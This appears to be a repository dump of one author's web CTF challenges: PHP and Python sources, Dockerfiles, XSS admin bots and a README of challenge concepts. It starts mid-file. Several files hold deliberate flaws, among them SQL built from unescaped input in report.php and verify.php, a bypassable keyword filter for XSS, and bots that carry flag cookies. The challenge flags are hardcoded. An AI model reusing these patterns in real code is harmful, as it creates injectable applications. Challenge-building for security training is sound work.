36 | 56 | 57 | 58 | -------------------------------------------------------------------------------- /2022/HSPACE_CTF/lucky7/lucky.php: -------------------------------------------------------------------------------- 1 | ]{8}'; // max length is 7, alert(1) -> dead 11 | $common = '[$&#;]|flag|name|eval|script|frame|on.{5}'; // common filter keywords 12 | if(preg_match("/{$seven}|{$common}/is", $jscode)) $jscode = 'print()'; 13 | 14 | if($action == 'run') 15 | echo ''; 16 | if($action == 'show') 17 | echo $jscode; 18 | ?> 19 | source -------------------------------------------------------------------------------- /2022/HSPACE_CTF/maidcha/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.7.9 2 | 3 | RUN mkdir /[CENSORED] 4 | RUN mkdir /memo 5 | 6 | COPY ./src /[CENSORED] 7 | COPY ./memo /memo 8 | 9 | RUN chmod 777 -R /[CENSORED] 10 | RUN chmod 777 -R /memo 11 | 12 | COPY ./flag /[CENSORED]/flag 13 | 14 | RUN pip install -r /[CENSORED]/requirements.txt 15 | 16 | EXPOSE 8080 17 | ENTRYPOINT ["python"] 18 | CMD ["/[CENSORED]/app.py"] -------------------------------------------------------------------------------- /2022/HSPACE_CTF/maidcha/flag: -------------------------------------------------------------------------------- 1 | hspace{fake-flag} -------------------------------------------------------------------------------- /2022/HSPACE_CTF/maidcha/memo/1: -------------------------------------------------------------------------------- 1 | Hello, I'm a maid cha. 2 | I'm sleepy. -------------------------------------------------------------------------------- /2022/HSPACE_CTF/maidcha/memo/2: -------------------------------------------------------------------------------- 1 | Enjoy it, super easy :) -------------------------------------------------------------------------------- /2022/HSPACE_CTF/maidcha/src/htdocs/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | maidcha 7 | 8 | 9 |

maidcha

10 | 1
11 | 2 12 | 13 | -------------------------------------------------------------------------------- /2022/HSPACE_CTF/maidcha/src/requirements.txt: -------------------------------------------------------------------------------- 1 | certifi==2021.10.8 2 | charset-normalizer==2.0.7 3 | idna==3.3 4 | urllib3==1.26.7 5 | -------------------------------------------------------------------------------- /2022/HSPACE_CTF/maidcha/src/response_form.py: -------------------------------------------------------------------------------- 1 | def not_found(): 2 | res = [] 3 | res.append('HTTP/1.1 404 Not Found') 4 | res.append('Content-Type: text/html;charset=utf-8') 5 | res.append('Content-Length: 18') 6 | res.append('Connection: close') 7 | res.append('') 8 | res.append('

Not found

') 9 | 10 | res = '\r\n'.join(res) 11 | return res 12 | 13 | def redirect(location='/'): 14 | res = [] 15 | res.append('HTTP/1.1 301 Moved Permanently') 16 | res.append('Content-Type: text/html;charset=utf-8') 17 | res.append(f"Location: {location}") 18 | res.append('Content-Length: 26') 19 | res.append('Connection: close') 20 | res.append('') 21 | res.append('

Moved Permanently

') 22 | 23 | res = '\r\n'.join(res) 24 | return res 25 | 26 | def bad_request(): 27 | res = [] 28 | res.append('HTTP/1.1 400 Bad Request') 29 | res.append('Content-Type: text/html;charset=utf-8') 30 | res.append('Content-Length: 18') 31 | res.append('Connection: close') 32 | res.append('') 33 | res.append('

Bad Request

') 34 | 35 | res = '\r\n'.join(res) 36 | return res 37 | 38 | def not_allow_method(allow_method=['GET']): 39 | res = [] 40 | res.append('HTTP/1.1 405 Method Not Allowed') 41 | res.append(f"Allow: {','.join(allow_method)}") 42 | res.append(f"Access-Control-Allow-Methods: {','.join(allow_method)}") 43 | res.append('Content-Length: 27') 44 | res.append('Content-Type: text/html;charset=utf-8') 45 | res.append('Connection: close') 46 | res.append('') 47 | res.append('

Method Not Allowed

') 48 | 49 | res = '\r\n'.join(res) 50 | return res 51 | 52 | def internal_server_error(error_msg=""): 53 | res = [] 54 | body = f"

Internal Server Error

{error_msg}" 55 | 56 | res.append('HTTP/1.1 500 Internal Server Error') 57 | res.append(f"Content-Length: {len(body)}") 58 | res.append('Content-Type: text/html;charset=utf-8') 59 | res.append('Connection: close') 60 | res.append('') 61 | res.append(body) 62 | 63 | res = '\r\n'.join(res) 64 | return res 65 | 66 | def normal_response(content, content_type='text/plain'): 67 | if content_type == None: 68 | content_type = 'text/plain' 69 | 70 | res = [] 71 | res.append('HTTP/1.1 200 OK') 72 | res.append(f"Content-Length: {len(content)}") 73 | res.append(f"Content-Type: {content_type}") 74 | res.append('Connection: close') 75 | res.append('') 76 | res.append(str(content)) 77 | 78 | res = '\r\n'.join(res) 79 | return res -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/BABY_XSS/bot/bot.py: -------------------------------------------------------------------------------- 1 | from selenium import webdriver 2 | import requests 3 | import time 4 | 5 | while True: 6 | r = requests.get("http://sunrin.kiminfo.kr:18625/onlybot.php") 7 | if r.text != '0': 8 | driver = webdriver.Chrome('./chromedriver.exe') 9 | driver.implicitly_wait(3) 10 | driver.set_page_load_timeout(3) 11 | 12 | driver.get("http://sunrin.kiminfo.kr:18625/") 13 | driver.add_cookie({"name": "FLAG", "value": "SUNRIN{tr1cky_xS5_9AME_lO1}"}) 14 | try: 15 | driver.get(r.text) 16 | print(r.text) 17 | time.sleep(3) 18 | driver.quit() 19 | except: 20 | driver.quit() 21 | else: 22 | time.sleep(5) 23 | 24 | print("It's working.", flush=True) -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/BABY_XSS/index.php: -------------------------------------------------------------------------------- 1 | 10 | 11 | 12 | 13 | 14 | 15 | 16 |

Sunrin XSS Sanitizer 1.0

17 | Can you bypass my sanitizer? Really?
18 | If you find a vulnerability, please report it here. 19 | 20 |
21 | 22 | 23 | 24 |
25 |

26 | 27 | 33 | 34 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/BABY_XSS/init.sql: -------------------------------------------------------------------------------- 1 | SET NAMES utf8mb4; 2 | 3 | CREATE TABLE `urls` ( 4 | `no` int(11) NOT NULL AUTO_INCREMENT, 5 | `url` varchar(4096) DEFAULT NULL, 6 | `is_read` int(1) DEFAULT 0, 7 | PRIMARY KEY (`no`) 8 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4; 9 | -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/BABY_XSS/onlybot.php: -------------------------------------------------------------------------------- 1 | query("SELECT * FROM urls WHERE is_read=0"); 6 | $fetch = $result->fetch_array(MYSQLI_ASSOC); 7 | 8 | if($fetch){ 9 | $db->query("UPDATE urls SET is_read=1 WHERE no={$fetch['no']}"); 10 | echo $fetch['url']; 11 | } else { 12 | echo '0'; 13 | } 14 | -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/BABY_XSS/report.php: -------------------------------------------------------------------------------- 1 | query("INSERT INTO urls VALUES (NULL, '{$url}', 0)"); 8 | echo ''; 9 | } 10 | else { 11 | echo ''; 12 | } 13 | } 14 | ?> 15 | 16 | 17 | 18 | 19 | 20 |

send us your url, admin will check it soon :)

21 |
22 | 23 | 24 |
25 | 26 | 27 | -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/HAPPY/bot/bot.py: -------------------------------------------------------------------------------- 1 | from selenium import webdriver 2 | import requests 3 | import time 4 | 5 | while True: 6 | r = requests.get("http://sunrin.kiminfo.kr:18777/onlybot.php") 7 | if r.text != '0': 8 | driver = webdriver.Chrome('./chromedriver.exe') 9 | driver.implicitly_wait(3) 10 | driver.set_page_load_timeout(3) 11 | 12 | driver.get("http://sunrin.kiminfo.kr:18777/") 13 | driver.add_cookie({"name": "FLAG", "value": "SUNRIN{rp0rpOrpOrpOzZrp0rprOprOp}"}) 14 | try: 15 | driver.get(r.text) 16 | print(r.text) 17 | time.sleep(3) 18 | driver.quit() 19 | except: 20 | driver.quit() 21 | else: 22 | time.sleep(5) 23 | 24 | print("It's working. (RPO)", flush=True) 25 | 26 | 27 | -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/HAPPY/config.js: -------------------------------------------------------------------------------- 1 | /* default values config */ 2 | let name = "admin"; 3 | let msg = "Can you get what you want?"; -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/HAPPY/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | If you find a vulnerability, please report it here. 10 |
11 | 12 | 13 | 14 |
15 |
16 | 30 | 31 | -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/HAPPY/init.sql: -------------------------------------------------------------------------------- 1 | SET NAMES utf8mb4; 2 | 3 | CREATE TABLE `urls` ( 4 | `no` int(11) NOT NULL AUTO_INCREMENT, 5 | `url` varchar(4096) DEFAULT NULL, 6 | `is_read` int(1) DEFAULT 0, 7 | PRIMARY KEY (`no`) 8 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4; 9 | -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/HAPPY/onlybot.php: -------------------------------------------------------------------------------- 1 | query("SELECT * FROM urls WHERE is_read=0"); 6 | $fetch = $result->fetch_array(MYSQLI_ASSOC); 7 | 8 | if($fetch){ 9 | $db->query("UPDATE urls SET is_read=1 WHERE no={$fetch['no']}"); 10 | echo $fetch['url']; 11 | } else { 12 | echo '0'; 13 | } 14 | -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/HAPPY/report.php: -------------------------------------------------------------------------------- 1 | query("INSERT INTO urls VALUES (NULL, '{$url}', 0)"); 8 | echo ''; 9 | } 10 | else { 11 | echo ''; 12 | } 13 | } 14 | ?> 15 | 16 | 17 | 18 | 19 | 20 |

send us your url, admin will check it soon :)

21 |
22 | 23 | 24 |
25 | 26 | 27 | -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/HAPPY/writeup/exploit.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2022/SUNRIN_CTF/LOGIN_MASTER/config.php: -------------------------------------------------------------------------------- 1 | prepare("INSERT INTO posts (title, content, author, iv) VALUES (:t, :c, :a, :iv)"); 11 | $stmt->bindValue(':t', $_POST['title'], SQLITE3_TEXT); 12 | 13 | $encryptedData = encryptAES($_POST['content']); 14 | $stmt->bindValue(':c', $encryptedData['ciphertext'], SQLITE3_TEXT); 15 | $stmt->bindValue(':iv', $encryptedData['iv'], SQLITE3_TEXT); 16 | $stmt->bindValue(':a', $_SESSION['username'], SQLITE3_TEXT); 17 | 18 | $stmt->execute(); 19 | } 20 | $stmt = $db->prepare("SELECT title, content, iv FROM posts WHERE author = :a ORDER BY id DESC"); 21 | $stmt->bindValue(':a', $_SESSION['username'], SQLITE3_TEXT); 22 | $rows = $stmt->execute(); 23 | ?> 24 | 25 | 26 | 27 | 28 | Board 29 | 30 | 31 | 32 |
33 |

Board

34 |
35 |
36 |
37 | 38 |
39 |
40 | fetchArray(SQLITE3_ASSOC)): ?> 41 |

42 | 45 |

46 |
47 | 48 |

Go Main

49 |
50 | 51 | -------------------------------------------------------------------------------- /2024/SUNRIN_CTF/memoboard/src/db.php: -------------------------------------------------------------------------------- 1 | exec(" 6 | CREATE TABLE IF NOT EXISTS users ( 7 | id INTEGER PRIMARY KEY AUTOINCREMENT, 8 | username TEXT UNIQUE, 9 | password TEXT, 10 | iv TEXT 11 | ); 12 | "); 13 | 14 | $db->exec(" 15 | CREATE TABLE IF NOT EXISTS posts ( 16 | id INTEGER PRIMARY KEY AUTOINCREMENT, 17 | title TEXT, 18 | content TEXT, 19 | author TEXT, 20 | iv TEXT 21 | ); 22 | "); 23 | 24 | $db->exec(" 25 | CREATE TABLE IF NOT EXISTS twofa ( 26 | id INTEGER PRIMARY KEY AUTOINCREMENT, 27 | username TEXT UNIQUE, 28 | twofa_enabled INTEGER DEFAULT 0, 29 | twofa_secret TEXT 30 | ); 31 | "); 32 | 33 | $db->exec(" 34 | CREATE TABLE IF NOT EXISTS tokens ( 35 | token TEXT UNIQUE 36 | ); 37 | "); 38 | 39 | function encryptAES($plain) { 40 | $key = 'dummydummydummydummydummydummydu'; 41 | $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length('aes-256-cbc')); 42 | $encrypted = openssl_encrypt($plain, 'aes-256-cbc', $key, OPENSSL_RAW_DATA, $iv); 43 | return [ 44 | 'ciphertext' => base64_encode($encrypted), 45 | 'iv' => base64_encode($iv) 46 | ]; 47 | } 48 | function decryptAES($ciphertext, $iv) { 49 | $key = 'dummydummydummydummydummydummydu'; 50 | $decodedCiphertext = base64_decode($ciphertext); 51 | $decodedIV = base64_decode($iv); 52 | return openssl_decrypt($decodedCiphertext, 'aes-256-cbc', $key, OPENSSL_RAW_DATA, $decodedIV); 53 | } -------------------------------------------------------------------------------- /2024/SUNRIN_CTF/memoboard/src/index.php: -------------------------------------------------------------------------------- 1 | 5 | 6 | 7 | 8 | 9 | Main 10 | 11 | 30 | 31 | 32 |
33 | 34 |

Memo board

35 |

Welcome to our service! Please log in or register to enjoy all features.

36 |

37 | Login | 38 | Register 39 |

40 |
41 |

Quick Links:

42 |
    43 |
  • Experience a secure memo board with 2FA.
    • 44 |
  • Enjoy a variety of features for free.
    • 45 |
  • Log out securely when you're done.
    • 46 |
47 |
48 | 49 |

Hello,

50 |

Welcome back! Explore the features available to you.

51 |

52 | Board | 53 | My Page | 54 | Logout 55 |

56 |
57 |

Quick Links:

58 |
    59 |
  • Experience a secure memo board with 2FA.
    • 60 |
  • Enjoy a variety of features for free.
    • 61 |
  • Log out securely when you're done.
    • 62 |
63 |
64 | 65 |
66 | 67 | -------------------------------------------------------------------------------- /2024/SUNRIN_CTF/memoboard/src/login.php: -------------------------------------------------------------------------------- 1 | prepare("SELECT * FROM users WHERE username = :u"); 14 | $stmt->bindValue(':u', $username, SQLITE3_TEXT); 15 | $res = $stmt->execute(); 16 | $user = $res->fetchArray(SQLITE3_ASSOC); 17 | 18 | if ($user) { 19 | $decryptedPassword = decryptAES($user['password'], $user['iv']); 20 | if ($decryptedPassword === $password) { 21 | $twofaStmt = $db->prepare("SELECT twofa_enabled FROM twofa WHERE username = :u"); 22 | $twofaStmt->bindValue(':u', $username, SQLITE3_TEXT); 23 | $twofaRes = $twofaStmt->execute(); 24 | $twofaData = $twofaRes->fetchArray(SQLITE3_ASSOC); 25 | 26 | if ($twofaData && $twofaData['twofa_enabled']) { 27 | $_SESSION['temp_username'] = $username; 28 | $_SESSION['temp_password'] = $password; 29 | header('Location: 2fa.php'); 30 | exit; 31 | } else { 32 | $_SESSION['username'] = $username; 33 | header('Location: index.php'); 34 | exit; 35 | } 36 | } else { 37 | $msg = 'Invalid username or password.'; 38 | } 39 | } else { 40 | $msg = 'Invalid username or password.'; 41 | } 42 | } 43 | } 44 | ?> 45 | 46 | 47 | 48 | 49 | Login 50 | 51 | 52 | 53 |
54 |

Login

55 | 56 |

57 | 58 |
59 |
60 |
61 |
62 | 63 | 64 |
65 |
66 |
67 | 68 | -------------------------------------------------------------------------------- /2024/SUNRIN_CTF/memoboard/src/logout.php: -------------------------------------------------------------------------------- 1 | prepare("SELECT * FROM twofa WHERE username=:u"); 9 | $stmt->bindValue(':u', $_SESSION['username'], SQLITE3_TEXT); 10 | $res = $stmt->execute(); 11 | $user = $res->fetchArray(SQLITE3_ASSOC); 12 | 13 | if ($_SERVER['REQUEST_METHOD'] === 'POST') { 14 | if (isset($_POST['enable2fa']) && $user['twofa_enabled'] == 0) { 15 | $secret = generateRandomSecret(); 16 | $upd = $db->prepare("UPDATE twofa SET twofa_enabled=1, twofa_secret=:s WHERE username=:u"); 17 | $upd->bindValue(':s', $secret, SQLITE3_TEXT); 18 | $upd->bindValue(':u', $_SESSION['username'], SQLITE3_TEXT); 19 | $upd->execute(); 20 | $msg = '2FA Enabled'; 21 | $user['twofa_enabled'] = 1; 22 | $user['twofa_secret'] = $secret; 23 | } 24 | } 25 | function generateRandomSecret($length = 16) { 26 | $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'; 27 | return implode('', array_map(fn() => $alphabet[random_int(0, strlen($alphabet) - 1)], range(1, $length))); 28 | } 29 | ?> 30 | 31 | 32 | 33 | 34 | My Page 35 | 36 | 37 | 38 |
39 |

My Page

40 | 41 |
42 | 43 |
44 | 45 |

46 | 2FA is Enabled.
47 | Secret:

48 | Please install Google Authenticator and add this secret code to register. 49 |

50 | 51 |

Go Main

52 |
53 | 54 | -------------------------------------------------------------------------------- /2024/SUNRIN_CTF/memoboard/src/register.php: -------------------------------------------------------------------------------- 1 | prepare("SELECT 1 FROM users WHERE username = :u"); 11 | $checkStmt->bindValue(':u', $username, SQLITE3_TEXT); 12 | $result = $checkStmt->execute(); 13 | $row = $result->fetchArray(SQLITE3_ASSOC); 14 | 15 | if ($row) { 16 | $msg = 'Username already exists!'; 17 | } else { 18 | $passwordData = encryptAES($password); 19 | $stmt = $db->prepare("INSERT INTO users (username, password, iv) VALUES (:u, :p, :iv)"); 20 | $stmt->bindValue(':u', $username, SQLITE3_TEXT); 21 | $stmt->bindValue(':p', $passwordData['ciphertext'], SQLITE3_TEXT); 22 | $stmt->bindValue(':iv', $passwordData['iv'], SQLITE3_TEXT); 23 | 24 | $twofaStmt = $db->prepare("INSERT INTO twofa (username) VALUES (:u)"); 25 | $twofaStmt->bindValue(':u', $username, SQLITE3_TEXT); 26 | try { 27 | $stmt->execute(); 28 | $twofaStmt->execute(); 29 | header('Location: login.php'); 30 | exit; 31 | } catch (Exception $e) { 32 | $msg = 'An error occurred during registration.'; 33 | } 34 | } 35 | } 36 | ?> 37 | 38 | 39 | 40 | 41 | Register 42 | 43 | 44 | 45 |
46 |

Register

47 | 48 |

49 | 50 |
51 |
52 |
53 |
54 | 55 | 56 |
57 |
58 |
59 | 60 | -------------------------------------------------------------------------------- /2024/SUNRIN_CTF/memoboard/src/style.css: -------------------------------------------------------------------------------- 1 | body { 2 | font-family: Arial, sans-serif; 3 | background-color: #f4f4f9; 4 | color: #333; 5 | display: flex; 6 | justify-content: center; 7 | align-items: center; 8 | height: 100vh; 9 | margin: 0; 10 | } 11 | 12 | .container { 13 | background-color: #fff; 14 | padding: 20px; 15 | border-radius: 8px; 16 | box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); 17 | width: 400px; 18 | text-align: center; 19 | } 20 | 21 | input[type="text"], input[type="password"], textarea { 22 | padding: 10px; 23 | margin: 10px 0; 24 | border: 1px solid #ddd; 25 | border-radius: 4px; 26 | } 27 | 28 | button { 29 | background-color: #007bff; 30 | color: #fff; 31 | border: none; 32 | padding: 10px 20px; 33 | border-radius: 4px; 34 | cursor: pointer; 35 | transition: background-color 0.3s; 36 | } 37 | 38 | button:hover { 39 | background-color: #0056b3; 40 | } 41 | 42 | h1 { 43 | margin-bottom: 20px; 44 | } 45 | 46 | p { 47 | margin: 10px 0; 48 | } 49 | 50 | form { 51 | margin-bottom: 20px; 52 | } -------------------------------------------------------------------------------- /2024/SUNRIN_CTF/memoboard/src/verify.php: -------------------------------------------------------------------------------- 1 | query($query); 17 | $user = $res->fetchArray(SQLITE3_ASSOC); 18 | 19 | if ($user) { 20 | $decryptedPassword = decryptAES($user['password'], $user['iv']); 21 | if ($decryptedPassword === $password) { 22 | $twofaStmt = $db->prepare("SELECT twofa_enabled FROM twofa WHERE username = :u"); 23 | $twofaStmt->bindValue(':u', $user['username'], SQLITE3_TEXT); 24 | $twofaRes = $twofaStmt->execute(); 25 | $twofaData = $twofaRes->fetchArray(SQLITE3_ASSOC); 26 | 27 | if ($twofaData && $twofaData['twofa_enabled']) { 28 | $stmt = $db->prepare("SELECT * FROM tokens WHERE token = :t"); 29 | $stmt->bindValue(':t', $token, SQLITE3_TEXT); 30 | $res = $stmt->execute(); 31 | $tokenRow = $res->fetchArray(SQLITE3_ASSOC); 32 | 33 | if ($tokenRow) { 34 | $stmt = $db->prepare("DELETE FROM tokens WHERE token = :t"); 35 | $stmt->bindValue(':t', $token, SQLITE3_TEXT); 36 | $stmt->execute(); 37 | 38 | $_SESSION['username'] = $user['username']; 39 | header('Location: index.php'); 40 | exit; 41 | } else { 42 | $msg = 'Invalid token.'; 43 | } 44 | } 45 | } else { 46 | $msg = 'Invalid username or password.'; 47 | } 48 | } else { 49 | $msg = 'Invalid username or password.'; 50 | } 51 | } 52 | ?> 53 | 54 | 55 | 56 | 57 | Verify 58 | 59 | 60 | 61 |
62 |

Verify Login

63 | 64 |

65 | 66 |
67 | 68 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # My CTF Challenges (99.98% Web Challenge) 2 | A collection of web challenges I made. 3 | 4 | ### 2017 5 | 6 | |CTF|Name|Concept| 7 | |---|---|---| 8 | | Belluminar CTF | Color world | XXE, XSLT Injection to RCE | 9 | | Layer7 CTF | daniel's daily life | BBCode XSS | 10 | | Layer7 CTF | Can you bypass me? | Bypass regexp, Eval function | 11 | | Power Of XX CTF | Basic web | SQL Injection | 12 | | Power Of XX CTF | SQL game | SQL Injection | 13 | | - | Can you do it? | SQL Injection | 14 | | - | Dirt-Y | MISC, PHP game | 15 | | - | Is this possible? | SQL Injection | 16 | | - | Simple Login | SQL Injection | 17 | 18 | ### 2018 19 | 20 | |CTF|Name|Concept| 21 | |---|---|---| 22 | | H3X0R CTF | SQL game revenge | SQL Injection | 23 | | H3X0R CTF | Goodaegi board | SQL Injection | 24 | | Sunrin Hacking Festival | Click the button | MISC, Coding | 25 | | Sunrin Hacking Festival | Pretty board | SQL Injection | 26 | | Sunrin Hacking Festival | Simple login | SQL Injection | 27 | | Sunrin Hacking Festival | Simple login revenge | LFI to RCE | 28 | | Layer7 CTF | Margaret | RCE via PHP Session | 29 | | Hackingcamp18 CTF | Pretty Shop | Indirect SQLite Injection | 30 | | - | Count | Race condition in php file function | 31 | 32 | ### 2019 33 | 34 | |CTF|Name|Concept| 35 | |---|---|---| 36 | | Christmas CTF | Dynamic SQL | PHP, SQL Injection | 37 | | Belluminar CTF | - | - | 38 | | Sunrin Internet High School CTF | jjang9 | PHP, Bypass open_basedir, LFI to RCE | 39 | | Sunrin Internet High School CTF | My first app | Flask, Blind CSS Injection | 40 | | Sunrin Internet High School CTF | Last old school | PHP, Error based SQL Injection | 41 | | - | rename | PHP filesystem bug | 42 | 43 | ### 2021 44 | 45 | |CTF|Name|Concept| 46 | |---|---|---| 47 | | LAYER7 CTF | handmade | Python, Path Traversal | 48 | | LAYER7 CTF | selfmade | Python, Logic Bug | 49 | 50 | ### 2022 51 | 52 | |CTF|Name|Concept| 53 | |---|---|---| 54 | | Best of the Best CTF(Web) | - | DOM Clobbering, XSS | 55 | | Best of the Best CTF(Web) | - | Prototype Pollution, XSS | 56 | | Best of the Best CTF(Web) | - | Relative Path Overwrite, XSS | 57 | | SUNRIN CTF | BABY XSS | XSS | 58 | | SUNRIN CTF | HAPPY | XSS | 59 | | SUNRIN CTF | LOGIN MASTER | SQLite3, SQL Injection | 60 | | HSPACE CTF | maidcha | Python, Logic Bug | 61 | | HSPACE CTF | hspace proxy | Python, SSRF, SQL Injection | 62 | | HSPACE CTF | lucky7 | XSS | 63 | --------------------------------------------------------------------------------